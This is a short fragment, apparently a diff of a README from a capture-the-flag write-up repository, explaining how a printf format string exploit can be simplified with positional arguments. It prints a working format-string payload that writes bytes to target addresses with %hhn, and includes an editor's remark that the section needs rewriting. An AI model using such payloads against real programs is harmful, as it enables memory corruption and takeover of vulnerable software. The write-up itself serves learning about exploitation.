extremecoders-re/tamu-ctf-writeup/README.md

 The exploit string can be simplified:

 We can use [positional arguments](http://stackoverflow.com/a/6322594/1833653) to `printf` which would eliminate the need for consuming dwords using `%08x`.

+_**This part needs to be re written**_

 The exploit string in this case would be:

 ```
 \x1d\xa0\x04\x08\x1c\xa0\x04\x08%125x%4$hhnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%hhn